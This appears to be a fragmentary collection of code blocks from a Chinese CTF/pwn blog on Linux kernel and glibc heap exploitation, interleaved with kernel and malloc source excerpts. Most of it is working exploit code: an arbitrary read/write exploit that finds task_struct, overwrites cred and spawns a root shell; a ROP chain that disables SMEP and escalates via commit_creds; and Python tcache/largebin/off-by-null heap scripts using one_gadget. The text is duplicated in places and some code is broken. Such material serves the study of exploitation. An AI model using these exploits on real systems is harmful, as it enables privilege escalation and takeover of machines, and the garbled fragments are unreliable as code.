// ioctl函数命令控制 longcondition_ioctl(struct file *filp, unsignedint cmd, unsignedlong arg) { int retval = 0; printk(KERN_INFO "Ioctl Get!\n"); switch (cmd) { case111: //doubleCon //get flag_addr printk("Your flag is at %llx! But I don't think you know it's content\n",flag); break;
case222: //doubleCon //print flag flagObj = (struct flagStruct*)arg; ssize_t userFlagAddr = flagObj->flagUser; ssize_t userFlagObjAddr = (ssize_t)flagObj; if(chk_range_not_ok(userFlagAddr,flagObj->len) &&chk_range_not_ok(userFlagObjAddr,0) &&(flagObj->len == strlen(flag))) { if(!strncmp(flagObj->flagUser,flag,strlen(flag))) printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag); else printk("Wrong!"); break; } else { printk("Wrong!\n"); break; } default: retval = -1; break; } return retval;
staticchar* flag = "flag{PIG007NBHH}"; //-------------------------------------------------- if(chk_range_not_ok(userFlagAddr,flagObj->len) &&chk_range_not_ok(userFlagObjAddr,0) &&(flagObj->len == strlen(flag)))
{ if(!strncmp(flagObj->flagUser,flag,strlen(flag))) printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag); else printk("Wrong!"); break; } else { printk("Wrong!\n"); break; }
//v5.11 /ipc/msg.c structmsg_queue { //这些为一些相关信息 structkern_ipc_permq_perm; time64_t q_stime; /* last msgsnd time */ time64_t q_rtime; /* last msgrcv time */ time64_t q_ctime; /* last change time */ unsignedlong q_cbytes; /* current number of bytes on queue */ unsignedlong q_qnum; /* number of messages in queue */ unsignedlong q_qbytes; /* max number of bytes on queue */ structpid *q_lspid;/* pid of last msgsnd */ structpid *q_lrpid;/* last receive pid */
//v5.11 do_msgrcv()函数中的 /* If we are copying, then do not unlink message and do * not update queue parameters. */ if (msgflg & MSG_COPY) { msg = copy_msg(msg, copy); goto out_unlock0; }
for (seg = msg->next; seg != NULL; seg = seg->next) { len -= alen; dest = (char __user *)dest + alen; alen = min(len, DATALEN_SEG); if (copy_to_user(dest, seg + 1, alen)) return-1; } return0; }
intmain(){ int test; size_t result=0; unsignedlong sysinfo_ehdr = getauxval(AT_SYSINFO_EHDR); result=memmem(sysinfo_ehdr,0x1000,"gettimeofday",12); printf("[+]VDSO : %p\n",sysinfo_ehdr); printf("[+]The offset of gettimeofday is : %x\n",result-sysinfo_ehdr); scanf("Wait! %d", test); /* gdb break point at 0x400A36 and then dump memory why only dump 0x1000 ??? */ if (sysinfo_ehdr!=0){ for (int i=0;i<0x2000;i+=1){ printf("%02x ",*(unsignedchar *)(sysinfo_ehdr+i)); } } }
structtask_struct { //............................................ #ifdef CONFIG_THREAD_INFO_IN_TASK /* * For reasons of header soup (see current_thread_info()), this * must be the first element of task_struct. */ stru/* Tracer's credentials at attach: */ conststructcred __rcu *ptracer_cred;
//open Dev char* pos = "/dev/arbWriteModule"; devFD = openDev(pos);
//search target chr char *buf = (char *)calloc(1,0x1000); puts("[+] we can read and write any memory"); for(;addr<0xffffc80000000000;addr+=0x1000){ arbitrary_read(devFD,0x1000,buf,addr); result=memmem(buf,0x1000,target,16); if (result){ printf("result:%p\n",result); cred= * (size_t *)(result-0x8); real_cred= *(size_t *)(result-0x10); // if ((cred||0xff00000000000000) && (real_cred == cred)) // { target_addr=addr+result-(int)(buf); printf("[+]found task_struct 0x%lx\n",target_addr); printf("[+]found cred 0x%lx\n",real_cred); break; // } } } if (result==0) { puts("not found , try again "); exit(-1); }
arbitrary_write(devFD,28,root_cred,real_cred);
if (getuid()==0){ printf("[+]now you are r00t,enjoy ur shell\n"); system("/bin/sh"); } else { puts("[-] there must be something error ... "); exit(-1); }
return0; }
intopenDev(char* pos){ int devFD; printf("[+] Open %s...\n",pos); if ((devFD = open(pos, O_RDWR)) < 0) { printf(" Can't open device file: %s\n",pos); exit(1); } return devFD; }
//version 4.4.72 staticint __orderly_poweroff(bool force) { int ret;
ret = run_cmd(poweroff_cmd);
if (ret && force) { pr_warn("Failed to start orderly shutdown: forcing the issue\n");
/* * I guess this should try to kick off some daemon to sync and * poweroff asap. Or not even bother syncing if we're doing an * emergency shutdown? */ emergency_sync(); kernel_power_off(); }
structmutexatomic_write_lock; structmutexlegacy_mutex; structmutexthrottle_mutex; structrw_semaphoretermios_rwsem; structmutexwinsize_mutex; spinlock_t ctrl_lock; spinlock_t flow_lock; /* Termios values are protected by the termios rwsem */ structktermiostermios, termios_locked; structtermiox *termiox;/* May be NULL for unsupported */ char name[64]; structpid *pgrp;/* Protected by ctrl lock */ structpid *session; unsignedlong flags; int count; structwinsizewinsize;/* winsize_mutex */ unsignedlong stopped:1, /* flow_lock */ flow_stopped:1, unused:BITS_PER_LONG - 2; int hw_stopped; unsignedlong ctrl_status:8, /* ctrl_lock */ packet:1, unused_ctrl:BITS_PER_LONG - 9; unsignedint receive_room; /* Bytes free for queue */ int flow_change;
structtty_struct *link; structfasync_struct *fasync; int alt_speed; /* For magic substitution of 38400 bps */ wait_queue_head_t write_wait; wait_queue_head_t read_wait; structwork_structhangup_work; void *disc_data; void *driver_data; structlist_headtty_files;
#define N_TTY_BUF_SIZE 4096
int closing; unsignedchar *write_buf; int write_cnt; /* If the tty has a pending do_SAK, queue it here - akpm */ structwork_structSAK_work; structtty_port *port; };
//正常的设置了dev_t和cdev,但是这里使用的class这个模板来创建设备驱动 //高12位为主设备号,低20位为次设备号 staticdev_t first; // Global variable for the first device number staticstructcdevc_dev;// Global variable for the character device structure staticstructclass *cl;// Global variable for the device class staticchar *buffer_var;
/* set value for commit_creds and prepare_kernel_cred */ commit_creds = (commit_creds_t)(memOffset - 0xfbf6a0); prepare_kernel_cred = (prepare_kernel_cred_t)(memOffset - 0xfbf2e0);
/* open fd on /dev/vuln */ printf("[+] Open vuln device...\n"); if ((fd = open("/dev/stack", O_RDWR)) < 0) { printf(" Can't open device file: /dev/stack\n"); exit(1); }
/* payload */ printf("[+] Construct the payload...\n"); save_state(); /* offset before RIP */ memcpy(p,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",116); p+=116;
memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8); /* for rbp */ p+=8;
/* pop rax;rbx;r12;rbp;ret */ memcpy(p,&pop_rax_rbx_r12_rbp_ret,8); printf(" pop rax at 0x%lx\n", pop_rax_rbx_r12_rbp_ret); p+=8; memcpy(p,"\xf0\x06\x00\x00\x00\x00\x00\x00",8); /* SMEP OFF */ p+=8; memcpy(p,"\x00\x00\x00\x00\x00\x00\x00\x00",8); /* rbx*/ p+=8; memcpy(p,"\x00\x00\x00\x00\x00\x00\x00\x00",8); /* r12 */ p+=8; memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8); /* rbp */ p+=8;
/* set value for commit_creds and prepare_kernel_cred */ commit_creds = (commit_creds_t)(memOffset - 0xfbf6a0); prepare_kernel_cred = (prepare_kernel_cred_t)(memOffset - 0xfbf2e0);
/* open fd on /dev/vuln */ printf("[+] Open vuln device...\n"); if ((fd = open("/dev/stack", O_RDWR)) < 0) { printf(" Can't open device file: /dev/stack\n"); exit(1); }
/* payload */ printf("[+] Construct the payload...\n"); save_state(); /* offset before RIP */ memcpy(p,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",116); p+=116;
memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8); /* for rbp */ p+=8;
/* getroot */ memcpy(p,&getR,8); p+=8;
/* swapgs;ret */ printf(" swapgs at 0x%lx\n", swapgs); memcpy(p,&swapgs,8); p+=8;
/* iretq */ printf(" iretq at 0x%lx\n", iretq); memcpy(p,&iretq,8); p+=8;
/* the stack should look like this after an iretq call RIP CS EFLAGS RSP SS */
/* Take a chunk off a bin list. */ staticvoid unlink_chunk(mstate av, mchunkptr p) { if (chunksize (p) != prev_size (next_chunk (p))) malloc_printerr ("corrupted size vs. prev_size");
mchunkptr fd = p->fd; mchunkptr bk = p->bk;
if (__builtin_expect (fd->bk != p || bk->fd != p, 0)) malloc_printerr ("corrupted double-linked list");
fd->bk = bk; bk->fd = fd; if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL) { if (p->fd_nextsize->bk_nextsize != p || p->bk_nextsize->fd_nextsize != p) malloc_printerr ("corrupted double-linked list (not small)");
#free 0~48 #1~49 #------------------------- #--tcache for i inrange(0,7): #0x88 free(i+1) for i inrange(14,21):#0xa8 free(i+1) for i inrange(21,28):#0xb8 free(i+1) for i inrange(35,42):#0xd8 free(i+1) for i inrange(42,49):#0xe8 free(i+1) #--tcache
for i inrange(52,57): #52~56 #53~57 merge into unsortedbin free(i+1)
#free 0~48 #1~49 #------------------------- #--tcache for i inrange(0,7): #0x88 free(i+1) for i inrange(14,21):#0xa8 free(i+1) for i inrange(21,28):#0xb8 free(i+1) for i inrange(35,42):#0xd8 free(i+1) for i inrange(42,49):#0xe8 free(i+1) #--tcache
for i inrange(52,57): #52~56 #53~57 merge into unsortedbin free(i+1)
#---------------------------------------------------------------- 上面是一个大的unsorted bin #进行add之后carver up and unsortedbin 被放入了largebin 之后进行了分配 add_malloc(0x98,'\x00')# 52 #97 #0x****9c0 add_malloc(0x98,'\x00')# 53 #98 #0x****A60
fake_chunk_size = 0x98 * "a" + p16(0x200) #这里我借用堆溢出来仿照off-by-null,修改还在largebin中的chunk的size从0x2e1->0x200 #changing largebinChunk_size will not cause abort edit(98,0x98+0x2,fake_chunk_size)#53 #98 add_malloc(0x88,'\x00')#54 #99 #0x****B00 add_malloc(0x88,'\x00')#55 #100 #0x****B90 add_malloc(0xd8,'\x00')#56 #101 #0x****C70
#构造preChunk的fd和bk------------------------ #------tcache for i inrange(7,14):#0x98 free(i+1) for i inrange(0,7):#0x88 free(i+1) for i inrange(42,49):#0xe8 free(i+1) #------tcache
#修复FD->bk和BK->fd----------------------------- #------tcache for i inrange(42,49):#0xe8 free(i+1) for i inrange(7,14):#0x98 free(i+1) for i inrange(21,28):#0xb8 free(i+1) #------tcache
//2.33 _int_malloc size = chunksize (victim); //这个size即为largebin中的chunk的size,nb为需要申请的chunk的size /* We know the first chunk in this bin is big enough to use. */ assert ((unsignedlong) (size) >= (unsignedlong) (nb));
/* Use the slow path in case any printf handler is registered. */ if (__glibc_unlikely (__printf_function_table != NULL || __printf_modifier_table != NULL || __printf_va_arg_table != NULL)) goto do_positional;
for i inrange(len(one_gadget)): lg("one_gadget["+str(i)+"]",libc_base+one_gadget[i]) add_malloc(0x68,'\x00'*0x13+p64(libc_base+one_gadget[])) #add_malloc(0x18,'PIG007NB') p.sendline('1') p.sendline('1') p.sendline('1') p.interactive()
#write_end can not be so far from wirte_base add_malloc(size_write_end-0x8,(p64(0x0)+p64(0x21))*((size_write_end-0x10)/0x10)) #idx 0x7 add_malloc(size_write_ptr-0x8,(p64(0x0)+p64(0x21))*((size_write_ptr-0x10)/0x10)) #idx 0x8
/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedefstructtcache_entry { structtcache_entry *next; /* This field exists to detect double frees. */ structtcache_perthread_struct *key; } tcache_entry;
{ size_t tc_idx = csize2tidx (size); if (tcache != NULL && tc_idx < mp_.tcache_bins) { /* Check to see if it's already in the tcache. */ tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100% trust it (it also matches random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely coincidence before aborting. */ if (__glibc_unlikely (e->key == tcache)) { tcache_entry *tmp; LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx); for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next) if (tmp == e) malloc_printerr ("free(): double free detected in tcache 2"); /* If we get here, it was a coincidence. We've wasted a few cycles, but don't abort. */ }
if (in_smallbin_range (nb)) { idx = smallbin_index (nb); bin = bin_at (av, idx);
if ((victim = last (bin)) != bin) { if (victim == 0) /* initialization check */ malloc_consolidate (av); else { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)) { errstr = "malloc(): smallbin double linked list corrupted"; goto errout; } set_inuse_bit_at_offset (victim, nb); bin->bk = bck; bck->fd = bin;
if (av != &main_arena) set_non_main_arena (victim); check_malloced_chunk (av, victim, nb);
#if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) { if (tc_victim != 0) { bck = tc_victim->bk; set_inuse_bit_at_offset (tc_victim, nb); if (av != &main_arena) set_non_main_arena (tc_victim); bin->bk = bck; bck->fd = bin;
//2.32 if (in_smallbin_range (nb)) { idx = smallbin_index (nb); bin = bin_at (av, idx);
if ((victim = last (bin)) != bin) { if (victim == 0) /* initialization check */ malloc_consolidate (av); else { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)) { errstr = "malloc(): smallbin double linked list corrupted"; goto errout; } set_inuse_bit_at_offset (victim, nb); bin->bk = bck; bck->fd = bin;
if (av != &main_arena) set_non_main_arena (victim); check_malloced_chunk (av, victim, nb); #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) { if (tc_victim != 0) { bck = tc_victim->bk; set_inuse_bit_at_offset (tc_victim, nb); if (av != &main_arena) set_non_main_arena (tc_victim); bin->bk = bck; bck->fd = bin;
if (SINGLE_THREAD_P) { /* Check that the top of the bin is not the record we are going to add (i.e., double free). */ if (__builtin_expect (old == p, 0)) malloc_printerr ("double free or corruption (fasttop)"); p->fd = PROTECT_PTR (&p->fd, old); *fb = p; } else do { /* Check that the top of the bin is not the record we are going to add (i.e., double free). */ if (__builtin_expect (old == p, 0)) malloc_printerr ("double free or corruption (fasttop)"); old2 = old; p->fd = PROTECT_PTR (&p->fd, old); } while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
/* Safe-Linking: Use randomness from ASLR (mmap_base) to protect single-linked lists of Fast-Bins and TCache. That is, mask the "next" pointers of the lists' chunks, and also perform allocation alignment checks on them. This mechanism reduces the risk of pointer hijacking, as was done with Safe-Unlinking in the double-linked lists of Small-Bins. It assumes a minimum page size of 4096 bytes (12 bits). Systems with larger pages provide less entropy, although the pointer mangling still works. */
tcache_thread_shutdown (void) { int i; tcache_perthread_struct *tcache_tmp = tcache;
if (!tcache) return;
/* Disable the tcache and prevent it from being reinitialized. */ tcache = NULL; tcache_shutting_down = true;
/* Free all of the entries and the tcache itself back to the arena heap for coalescing. */ for (i = 0; i < TCACHE_MAX_BINS; ++i) { while (tcache_tmp->entries[i]) { tcache_entry *e = tcache_tmp->entries[i]; if (__glibc_unlikely (!aligned_OK (e))) malloc_printerr ("tcache_thread_shutdown(): " "unaligned tcache chunk detected"); tcache_tmp->entries[i] = REVEAL_PTR (e->next); __libc_free (e); } }
if (__glibc_unlikely (e->key == tcache)) { tcache_entry *tmp; LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx); for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->next)) { if (__glibc_unlikely (!aligned_OK (tmp))) malloc_printerr ("free(): unaligned chunk detected in tcache 2"); if (tmp == e) malloc_printerr ("free(): double free detected in tcache 2"); /* If we get here, it was a coincidence. We've wasted a few cycles, but don't abort. */ } }
1 2
if (__glibc_unlikely (!aligned_OK (tmp))) malloc_printerr ("free(): unaligned chunk detected in tcache 2");